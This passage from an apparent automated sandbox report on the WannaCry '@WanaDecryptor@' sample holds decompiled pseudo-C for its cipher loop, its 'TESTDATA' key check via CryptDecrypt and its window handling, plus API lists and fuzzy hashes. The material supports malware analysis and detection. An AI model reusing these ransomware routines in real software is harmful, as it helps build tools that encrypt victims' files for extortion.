                                  												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
                                  												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
                                  													_t329 =  *(_t356 + 0x1c);
                                  												} else {
                                  													_t329 =  *(_t356 + 0x1c);
                                  													 *((char*)(_t356 + 0x1a)) = 0;
                                  													do {
                                  														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
                                  														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
                                  														_t273 = "UT";
                                  														_t186 = _t356 + 0x18;
                                  														while(1) {
                                  															_t235 =  *_t186;
                                  															_t303 = _t235;
                                  															__eflags = _t235 -  *_t273;
                                  															if(_t235 !=  *_t273) {
                                  																break;
                                  															}
                                  															__eflags = _t303;
                                  															if(_t303 == 0) {
                                  																L57:
                                  																_t186 = 0;
                                  															} else {
                                  																_t239 =  *((intOrPtr*)(_t186 + 1));
                                  																_t311 = _t239;
                                  																_t92 = _t273 + 1; // 0x2f000054
                                  																__eflags = _t239 -  *_t92;
                                  																if(_t239 !=  *_t92) {
                                  																	break;
                                  																} else {
                                  																	_t186 = _t186 + 2;
                                  																	_t273 = _t273 + 2;
                                  																	__eflags = _t311;
                                  																	if(_t311 != 0) {
                                  																		continue;
                                  																	} else {
                                  																		goto L57;
                                  																	}
                                  																}
                                  															}
                                  															L59:
                                  															__eflags = _t186;
                                  															if(_t186 == 0) {
                                  																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
                                  																_t343 = _t341 + 5;
                                  																_t276 = 1;
                                  																__eflags = _t188 & 0x00000001;
                                  																 *((char*)(_t356 + 0x12)) = 1;
                                  																if((_t188 & 0x00000001) != 0) {
                                  																	_t309 =  *((intOrPtr*)(_t343 + _t329));
                                  																	_t343 = _t343 + 4;
                                  																	__eflags = 0 << 8;
                                  																	_t212 = E00411B50(_t309, 0 << 8 << 8);
                                  																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                  																	 *(_t346 + 0x11c) = _t212;
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
                                  																}
                                  																__eflags = 1;
                                  																if(1 != 0) {
                                  																	_t307 =  *((intOrPtr*)(_t343 + _t329));
                                  																	_t343 = _t343 + 4;
                                  																	__eflags = 0 << 8;
                                  																	_t204 = E00411B50(_t307, 0 << 8 << 8);
                                  																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                  																	 *(_t346 + 0x10c) = _t204;
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
                                  																}
                                  																__eflags = _t276;
                                  																if(_t276 != 0) {
                                  																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
                                  																	_t356 = _t356 + 4;
                                  																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
                                  																}
                                  															} else {
                                  																goto L60;
                                  															}
                                  															goto L69;
                                  														}
                                  														asm("sbb eax, eax");
                                  														asm("sbb eax, 0xffffffff");
                                  														goto L59;
                                  														L60:
                                  														_t341 = _t341 + 4;
                                  														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
                                  													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
                                  												}
                                  												L69:
                                  												__eflags = _t329;
                                  												if(_t329 != 0) {
                                  													_push(_t329);
                                  													L00412C98();
                                  													_t356 = _t356 + 4;
                                  												}
                                  												_t182 =  *((intOrPtr*)(_t356 + 0x20));
                                  												memcpy(_t182 + 8, _t346, 0x4b << 2);
                                  												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
                                  												__eflags = 0;
                                  												return 0;
                                  												goto L73;
                                  											}
                                  										} else {
                                  											_push(_t313);
                                  											L00412C98();
                                  											return 0x800;
                                  										}
                                  									} else {
                                  										return 0x800;
                                  									}
                                  								} else {
                                  									return 0x700;
                                  								}
                                  							} else {
                                  								goto L8;
                                  							}
                                  						} else {
                                  							if(_t312 == _t232) {
                                  								L8:
                                  								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
                                  								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
                                  								 *((char*)(_t226 + 4)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x108)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x110)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x114)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x118)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x120)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x124)) = 0;
                                  								 *((intOrPtr*)(_t226 + 0x128)) = 0;
                                  								__eflags = 0;
                                  								return 0;
                                  							} else {
                                  								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L73:
                                  			}





























































                                  0x00411fe8
                                  0x00411fe8
                                  0x00411ff2
                                  0x00411ff4
                                  0x00411ffc
                                  0x00411ffc
                                  0x00411ffe
                                  0x00411ffe
                                  0x00412008
                                  0x0041200a
                                  0x00412012
                                  0x00412012
                                  0x00412014
                                  0x00412014
                                  0x0041201a
                                  0x0041201c
                                  0x00412024
                                  0x00412024
                                  0x00412026
                                  0x00412026
                                  0x00412035
                                  0x00412037
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412039
                                  0x00412043
                                  0x00412047
                                  0x00412058
                                  0x0041205e
                                  0x00412063
                                  0x00412066
                                  0x00412074
                                  0x00412078
                                  0x0041207e
                                  0x00412082
                                  0x00412086
                                  0x0041208c
                                  0x00412092
                                  0x0041209c
                                  0x0041209e
                                  0x004120a4
                                  0x004120aa
                                  0x004120b0
                                  0x004121f2
                                  0x004120b6
                                  0x004120b6
                                  0x004120ba
                                  0x004120bf
                                  0x004120c6
                                  0x004120ca
                                  0x004120ce
                                  0x004120d3
                                  0x004120d7
                                  0x004120d7
                                  0x004120d9
                                  0x004120db
                                  0x004120dd
                                  0x00000000
                                  0x00000000
                                  0x004120df
                                  0x004120e1
                                  0x004120f7
                                  0x004120f7
                                  0x004120e3
                                  0x004120e3
                                  0x004120e6
                                  0x004120e8
                                  0x004120e8
                                  0x004120eb
                                  0x00000000
                                  0x004120ed
                                  0x004120ed
                                  0x004120f0
                                  0x004120f3
                                  0x004120f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004120f5
                                  0x004120eb
                                  0x00412100
                                  0x00412100
                                  0x00412102
                                  0x00412120
                                  0x00412124
                                  0x00412133
                                  0x00412136
                                  0x00412138
                                  0x0041213c
                                  0x00412150
                                  0x00412153
                                  0x0041215e
                                  0x00412161
                                  0x00412166
                                  0x0041216a
                                  0x00412170
                                  0x00412173
                                  0x00412173
                                  0x00412179
                                  0x0041217b
                                  0x0041218f
                                  0x00412192
                                  0x0041219d
                                  0x004121a0
                                  0x004121a5
                                  0x004121a9
                                  0x004121af
                                  0x004121b2
                                  0x004121b2
                                  0x004121b8
                                  0x004121ba
                                  0x004121e1
                                  0x004121e7
                                  0x004121ea
                                  0x004121ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412102
                                  0x004120fb
                                  0x004120fd
                                  0x00000000
                                  0x00412104
                                  0x0041210e
                                  0x00412115
                                  0x00412115
                                  0x00412119
                                  0x004121f6
                                  0x004121f6
                                  0x004121f8
                                  0x004121fa
                                  0x004121fb
                                  0x00412200
                                  0x00412200
                                  0x00412203
                                  0x00412214
                                  0x0041221f
                                  0x00412225
                                  0x0041222e
                                  0x00000000
                                  0x0041222e
                                  0x00411e83
                                  0x00411e83
                                  0x00411e84
                                  0x00411e9a
                                  0x00411e9a
                                  0x00411e47
                                  0x00411e53
                                  0x00411e53
                                  0x00411e1e
                                  0x00411e2a
                                  0x00411e2a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411d37
                                  0x00411d39
                                  0x00411d5e
                                  0x00411d66
                                  0x00411d6d
                                  0x00411d71
                                  0x00411d74
                                  0x00411d7a
                                  0x00411d80
                                  0x00411d86
                                  0x00411d8c
                                  0x00411d92
                                  0x00411d98
                                  0x00411d9e
                                  0x00411da4
                                  0x00411daa
                                  0x00411db2
                                  0x00411d3b
                                  0x00411d57
                                  0x00411d57
                                  0x00411d39
                                  0x00411d35
                                  0x00411d16
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /../$/..\$\../$\..\
                                  • API String ID: 0-3885502717
                                  • Opcode ID: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                  • Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
                                  • Opcode Fuzzy Hash: 640072b25ce39f29e2e0ef118f9821fd9eceea7f93f8cfb82637dd0406826ea6
                                  • Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004067F0(void* __ecx) {
                                  				signed int _v84;
                                  				void* _v88;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				int _t16;
                                  				int _t21;
                                  				int _t22;
                                  				int _t37;
                                  				struct tagRECT* _t48;
                                  				void* _t56;
                                  
                                  				_t56 = __ecx;
                                  				_t16 = IsIconic( *(__ecx + 0x20));
                                  				if(_t16 == 0) {
                                  					L00412CBC();
                                  					return _t16;
                                  				} else {
                                  					_push(_t56);
                                  					L00412DD0();
                                  					asm("sbb eax, eax");
                                  					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
                                  					_t21 = GetSystemMetrics(0xb);
                                  					_t22 = GetSystemMetrics(0xc);
                                  					_t48 =  &_v104;
                                  					GetClientRect( *(_t56 + 0x20), _t48);
                                  					asm("cdq");
                                  					asm("cdq");
                                  					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
                                  					L00412DB8();
                                  					return _t37;
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                  • String ID:
                                  • API String ID: 1397574227-0
                                  • Opcode ID: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                  • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                  • Opcode Fuzzy Hash: c6b99cd5ac0b71c3c4030717ac5958d372fb1afb6ef73d6220d96d7f8d3b0266
                                  • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
                                  				void* _v4;
                                  				void* _v12;
                                  				char _v16;
                                  				void* _v20;
                                  				char _v24;
                                  				struct HWND__* _v32;
                                  				WCHAR* _v36;
                                  				struct HWND__* _t90;
                                  				signed int* _t100;
                                  				signed int _t102;
                                  				signed int _t105;
                                  				signed int* _t109;
                                  				signed int _t113;
                                  				signed int _t114;
                                  				signed int _t121;
                                  				void* _t124;
                                  				signed int _t130;
                                  				signed int _t132;
                                  				signed int _t138;
                                  				signed int _t143;
                                  				signed int _t152;
                                  				signed int _t157;
                                  				void* _t185;
                                  				void* _t188;
                                  				signed int* _t191;
                                  				void* _t204;
                                  				signed int _t206;
                                  				struct HWND__* _t207;
                                  				void* _t211;
                                  				void* _t212;
                                  				void* _t217;
                                  				void* _t218;
                                  				signed int _t221;
                                  				void* _t224;
                                  				signed int* _t226;
                                  				void* _t227;
                                  				void* _t228;
                                  
                                  				_t228 = _t227 - 0xc;
                                  				_t124 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  					_push(0x41c9c0);
                                  					_push( &_v16);
                                  					L004130FC();
                                  				}
                                  				_t206 = _a12;
                                  				_t185 = 0;
                                  				if(_t206 == 0) {
                                  					L26:
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
                                  					_push(0x41c9c0);
                                  					_push( &_v16);
                                  					L004130FC();
                                  					_push(_t206);
                                  					_t90 = FindWindowW(0, _v36); // executed
                                  					_t207 = _t90;
                                  					if(_t207 != 0) {
                                  						_push(_t185);
                                  						ShowWindow(_t207, 5); // executed
                                  						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
                                  						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                  						SetForegroundWindow(_t207); // executed
                                  						SetFocus(_t207);
                                  						SetActiveWindow(_t207);
                                  						BringWindowToTop(_t207);
                                  						_t90 = _v32;
                                  						if(_t90 != 0) {
                                  							ExitProcess(0);
                                  						}
                                  					}
                                  					return _t90;
                                  				} else {
                                  					_t130 =  *(_t124 + 0x3cc);
                                  					if(_t206 % _t130 != 0) {
                                  						goto L26;
                                  					} else {
                                  						_t100 = _a16;
                                  						if(_t100 != 1) {
                                  							L13:
                                  							_a16 = _t185;
                                  							if(_t100 != 2) {
                                  								L23:
                                  								_t102 = _t206 / _t130;
                                  								_t188 = _a4;
                                  								_t221 = _a8;
                                  								if(_t102 <= 0) {
                                  									goto L11;
                                  								} else {
                                  									do {
                                  										_push(_t221);
                                  										_push(_t188);
                                  										E0040B0C0(_t124);
                                  										_t132 =  *(_t124 + 0x3cc);
                                  										_t188 = _t188 + _t132;
                                  										_t221 = _t221 + _t132;
                                  										_a8 = _a8 + 1;
                                  										_t105 = _t206 / _t132;
                                  									} while (_a8 < _t105);
                                  									return _t105;
                                  								}
                                  							} else {
                                  								_t102 = _t206 / _t130;
                                  								_t191 = _a8;
                                  								_t224 = _a4;
                                  								_a4 = _t191;
                                  								if(_t102 <= 0) {
                                  									goto L11;
                                  								} else {
                                  									while(1) {
                                  										_t50 = _t124 + 0x3f0; // 0x444
                                  										_push(_t191);
                                  										E0040ADC0(_t124);
                                  										_t109 = _t191;
                                  										if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                  											break;
                                  										}
                                  										_t211 = 0;
                                  										if( *(_t124 + 0x3cc) > 0) {
                                  											do {
                                  												 *_t109 =  *_t109 ^  *(_t211 + _t224);
                                  												_t109 =  &(_t109[0]);
                                  												_t211 = _t211 + 1;
                                  											} while (_t211 <  *(_t124 + 0x3cc));
                                  										}
                                  										_t212 = _t224;
                                  										_t56 = _t124 + 0x3f0; // 0x444
                                  										_t138 =  *(_t124 + 0x3cc) >> 2;
                                  										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
                                  										_t228 = _t228 + 0x18;
                                  										_t143 =  *(_t124 + 0x3cc);
                                  										_t114 = _t113 / _t143;
                                  										_t224 = _t224 + _t143;
                                  										_v4 = _v4 + _t143;
                                  										_t206 = _a8 + 1;
                                  										_a8 = _t206;
                                  										if(_t206 < _t114) {
                                  											_t191 = _v4;
                                  											continue;
                                  										} else {
                                  											return _t114;
                                  										}
                                  										goto L31;
                                  									}
                                  									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  									_t130 =  &_v24;
                                  									_push(0x41c9c0);
                                  									_push(_t130);
                                  									L004130FC();
                                  									goto L23;
                                  								}
                                  							}
                                  						} else {
                                  							_t102 = _t206 / _t130;
                                  							_t226 = _a8;
                                  							_a16 = 0;
                                  							if(_t102 <= 0) {
                                  								L11:
                                  								return _t102;
                                  							} else {
                                  								while(1) {
                                  									_push(_t226);
                                  									_push(_a4);
                                  									E0040B0C0(_t124);
                                  									_t100 = _t226;
                                  									if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                  										break;
                                  									}
                                  									_t217 = 0;
                                  									if( *(_t124 + 0x3cc) > 0) {
                                  										_t22 = _t124 - _t226 + 0x3f0; // 0x444
                                  										_t204 = _t22;
                                  										do {
                                  											 *_t100 =  *_t100 ^  *(_t204 + _t100);
                                  											_t100 =  &(_t100[0]);
                                  											_t217 = _t217 + 1;
                                  										} while (_t217 <  *(_t124 + 0x3cc));
                                  									}
                                  									_t218 = _v4;
                                  									_t27 = _t124 + 0x3f0; // 0x444
                                  									_t152 =  *(_t124 + 0x3cc) >> 2;
                                  									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
                                  									_t228 = _t228 + 0x18;
                                  									_t157 =  *(_t124 + 0x3cc);
                                  									_t102 = _t121 / _t157;
                                  									_t185 = _v4 + _t157;
                                  									_t226 = _t226 + _t157;
                                  									_t206 = _a8 + 1;
                                  									_v4 = _t185;
                                  									_a8 = _t206;
                                  									if(_t206 < _t102) {
                                  										continue;
                                  									} else {
                                  										goto L11;
                                  									}
                                  									goto L31;
                                  								}
                                  								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  								_t130 =  &_v24;
                                  								_push(0x41c9c0);
                                  								_push(_t130);
                                  								L004130FC();
                                  								goto L13;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L31:
                                  			}
                                  0x0040b589
                                  0x0040b58a
                                  0x0040b590
                                  0x0040b512
                                  0x00000000
                                  0x0040b592
                                  0x0040b599
                                  0x0040b599
                                  0x00000000
                                  0x0040b590
                                  0x0040b5a5
                                  0x0040b5ab
                                  0x0040b5af
                                  0x0040b5b4
                                  0x0040b5b5
                                  0x00000000
                                  0x0040b5b5
                                  0x0040b50e
                                  0x0040b41d
                                  0x0040b429
                                  0x0040b42b
                                  0x0040b42f
                                  0x0040b435
                                  0x0040b4c5
                                  0x0040b4cc
                                  0x0040b43b
                                  0x0040b43b
                                  0x0040b43f
                                  0x0040b440
                                  0x0040b443
                                  0x0040b44b
                                  0x0040b44f
                                  0x00000000
                                  0x00000000
                                  0x0040b457
                                  0x0040b45b
                                  0x0040b461
                                  0x0040b461
                                  0x0040b467
                                  0x0040b46e
                                  0x0040b476
                                  0x0040b477
                                  0x0040b478
                                  0x0040b467
                                  0x0040b482
                                  0x0040b488
                                  0x0040b48e
                                  0x0040b49e
                                  0x0040b49e
                                  0x0040b4a0
                                  0x0040b4aa
                                  0x0040b4b0
                                  0x0040b4b2
                                  0x0040b4b4
                                  0x0040b4b5
                                  0x0040b4b9
                                  0x0040b4bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040b4bf
                                  0x0040b4d8
                                  0x0040b4de
                                  0x0040b4e2
                                  0x0040b4e7
                                  0x0040b4e8
                                  0x00000000
                                  0x0040b4e8
                                  0x0040b435
                                  0x0040b417
                                  0x0040b40a
                                  0x00000000

                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                  • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                  • Opcode Fuzzy Hash: 2930f8dc85a5339e3a1fcc916d8be05eb344af61b78126309babfa6b5c92ee79
                                  • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                                  				long* _v8;
                                  				char _v20;
                                  				void _v539;
                                  				char _v540;
                                  				char _v543;
                                  				char _v544;
                                  				intOrPtr _v548;
                                  				char _v552;
                                  				int _v556;
                                  				intOrPtr _v560;
                                  				void* __ebx;
                                  				char _t38;
                                  				void* _t45;
                                  				void* _t48;
                                  				intOrPtr _t63;
                                  				intOrPtr _t67;
                                  				signed int _t76;
                                  				unsigned int _t78;
                                  				signed int _t79;
                                  				long* _t85;
                                  				char _t92;
                                  				void* _t116;
                                  				intOrPtr _t118;
                                  				void* _t120;
                                  				void* _t121;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x415e38);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t118;
                                  				_t63 = __ecx;
                                  				_v560 = __ecx;
                                  				_t38 = "TESTDATA"; // 0x54534554
                                  				_v552 = _t38;
                                  				_t67 =  *0x420c64; // 0x41544144
                                  				_v548 = _t67;
                                  				_t92 =  *0x420c68; // 0x0
                                  				_v544 = _t92;
                                  				_v543 = 0;
                                  				_v540 = 0;
                                  				memset( &_v539, 0, 0x7f << 2);
                                  				_t120 = _t118 - 0x21c + 0xc;
                                  				asm("stosw");
                                  				asm("stosb");
                                  				asm("repne scasb");
                                  				_v556 = 0xbadbac;
                                  				if(E004046B0(_t63) == 0) {
                                  					L6:
                                  					 *[fs:0x0] = _v20;
                                  					return 0;
                                  				} else {
                                  					_v8 = 0;
                                  					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
                                  					_t121 = _t120 + 0xc;
                                  					if(_t45 == 0) {
                                  						L12:
                                  						_push(0xffffffff);
                                  						_push( &_v20);
                                  						goto L5;
                                  					} else {
                                  						_t76 = _a8;
                                  						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
                                  						_t121 = _t121 + 0xc;
                                  						if(_t48 == 0) {
                                  							goto L12;
                                  						} else {
                                  							asm("repne scasb");
                                  							_t78 =  !(_t76 | 0xffffffff);
                                  							_t116 =  &_v552 - _t78;
                                  							_t79 = _t78 >> 2;
                                  							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
                                  							_t121 = _t121 + 0x18;
                                  							_push(0x200);
                                  							_push( &_v556);
                                  							_push( &_v540);
                                  							_push(0);
                                  							_push(1);
                                  							_push(0);
                                  							_push( *((intOrPtr*)(_t63 + 8)));
                                  							if( *0x4217cc() != 0) {
                                  								_t85 =  *(_t63 + 0xc);
                                  								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
                                  									asm("repne scasb");
                                  									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
                                  										_v8 = 0xffffffff;
                                  										E004049A6(_t63);
                                  										goto L6;
                                  									} else {
                                  										_push(0xffffffff);
                                  										_push( &_v20);
                                  										L00413056();
                                  										 *[fs:0x0] = _v20;
                                  										return 1;
                                  									}
                                  								} else {
                                  									_push(0xffffffff);
                                  									_push( &_v20);
                                  									goto L5;
                                  								}
                                  							} else {
                                  								_push(0xffffffff);
                                  								_push( &_v20);
                                  								L5:
                                  								L00413056();
                                  								goto L6;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}


                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E,00000001,?,0019FA30), ref: 004046CD
                                    • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                    • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                    • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                  • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,00000200,?,?,?,00000001,?,0019FA30), ref: 004048DB
                                  • _local_unwind2.MSVCRT ref: 004048EB
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,?,0019FA30), ref: 00404920
                                  • strncmp.MSVCRT(00000000,?,?,?,?,?,00000001,?,0019FA30), ref: 00404951
                                  • _local_unwind2.MSVCRT ref: 00404964
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                  • String ID: TESTDATA
                                  • API String ID: 154225373-1607903762
                                  • Opcode ID: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                  • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                  • Opcode Fuzzy Hash: 9fc8fd852483a7773baa26bdbab2755cf9050b3d98a8213ca234863979ca94e3
                                  • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
                                  				int _v8;
                                  				char _v20;
                                  				long _v32;
                                  				int _v36;
                                  				long _v40;
                                  				void* _v44;
                                  				long _t24;
                                  				int _t28;
                                  				BYTE* _t35;
                                  				void* _t46;
                                  				long _t51;
                                  				intOrPtr _t53;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x415e48);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t53;
                                  				_v44 = 0xffffffff;
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				_v8 = 0;
                                  				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                  				_v44 = _t46;
                                  				if(_t46 == 0xffffffff) {
                                  					L10:
                                  					_push(0xffffffff);
                                  					goto L11;
                                  				} else {
                                  					_t24 = GetFileSize(_t46, 0);
                                  					_t51 = _t24;
                                  					_v40 = _t51;
